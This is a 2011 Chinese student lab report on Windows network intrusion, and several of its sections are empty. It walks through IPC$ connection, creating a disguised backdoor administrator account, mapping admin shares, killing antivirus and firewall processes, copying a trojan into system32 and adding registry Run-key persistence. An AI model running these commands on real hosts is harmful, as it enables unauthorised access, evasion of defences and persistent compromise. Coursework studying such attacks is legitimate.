网络入侵实验报告.doc

河北科技师范学院欧美学院 网络入侵上机实验报告 所在院（系） 信息技术系 专业班级 电子商务二班 学生姓名 杨 洁 学 号 9221090208 实验时间 2011.5.3 实验地点 F楼301教室 指导教师 刘正林 一、实验名称 二、实验环境 、实验内容 步骤二：与目标主机进行连接。 通过开始菜单打开运行对话框，在其中输入命令来打开命令提示符对话框，在其中输入net use \\IP地址(或计算机名)\IPC$ “密码” /user:“用户名”，例如：net use \\192.168.56.101\ipc$ “123” /user:“administrator”，来与目标主机进行连接。 步骤三：运用net user命令来创建一个用户账户。 创建的用户账户在命名时应该尽量接近计算机自行建立的用户账户，来使新建的账号不易被用户察觉进而删除，从而成为下次入侵的后门账户，运用net localgroup把用户账户加入Administrators,因为Administrators是管理员级别的账号，拥有对计算机进行所有操作的权限。 步骤四：在创建账户之后我们可以查看远程计算机的硬盘内容。 我们可先使用sc start lanmanserver 开启文件共享服务(Windows在提供IPC$共享功能的同时，还开启了默认共享，即所有的逻辑共享 (C$,D$,E$ …… ) 和系统文件夹共享(admin$) 。所有的这些，微软的初衷都是为了方便管理员的管理，但在有意无意中，导致了系统安全性的降低)。 进而使用net view查看网络中的共享资源，使用方法为：“net use 映射的盘符名称: \\192.168.56.101\被映射的盘符名称$”，例如：net use Z: \\192.168.56.101\c$ 步骤五：运用命令查看和终止远程计算机上的进程（如关闭防火墙软件、杀毒软件等）。 像是在命令提示符对话框中输入”tasklist”查看运行的程序或进程,语法为tasklist /s 远程主机IP /u 用户名 /p 密码，之后会显示出印象名称，PID会话名等选项，通过显示的印象名称来判断运行的程序或进程的性质，然后再使用taskkill /s 远程主机IP /u 用户名 /p 密码 /pid 进程ID号，终止远程计算机上妨碍你运行的进程。 也可使用sc stop 服务名来关闭计算机上的一些防御系统，例如sc stop SharedAccess用于关闭内置防火墙，或者运用sc config 来配置某个服务的启动类型，其语法为“sc config 服务名 start= (auto / disabled)”，配置某个服务的启动类型（自动启动、已禁用），例如：sc config TlntSvr start= auto 。(注意：sc config语句中的“=”与值间有一空格) 步骤六：向远程计算机上复制文件（如木马程序，脚本命令文件等）。 方法为使用copy命令,例如：copy c:\muma.exe Y:\system32的意思为把c盘下一个叫做\muma.exe的文件复制到Y:\system32文件夹下。当然因为有了印象盘也可以通过拖拽的方式来完成，但是图形化的界面是大量的数据在网络传输中会很慢，所以此方法一般只用于局域网内入侵时使用。 步骤七：启动传输过去的一些应用程序。 通过启动“任务管理器”来使传过去的应用程序在指定的情况下运行。 步骤八：注册表入侵 注册表（Registry）是Windows中的一个重要的数据库用于存储系统和应用程序的设置信息 注册表中有个很重要的区域，储存有开机自动运行的程序 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 注册表编辑器(regedit)不仅可修改本地计算机上的注册表，也可以修改到远程计算机上的注册表 步骤九：重启、关闭远程计算机 命令：shutdown 四、实验结果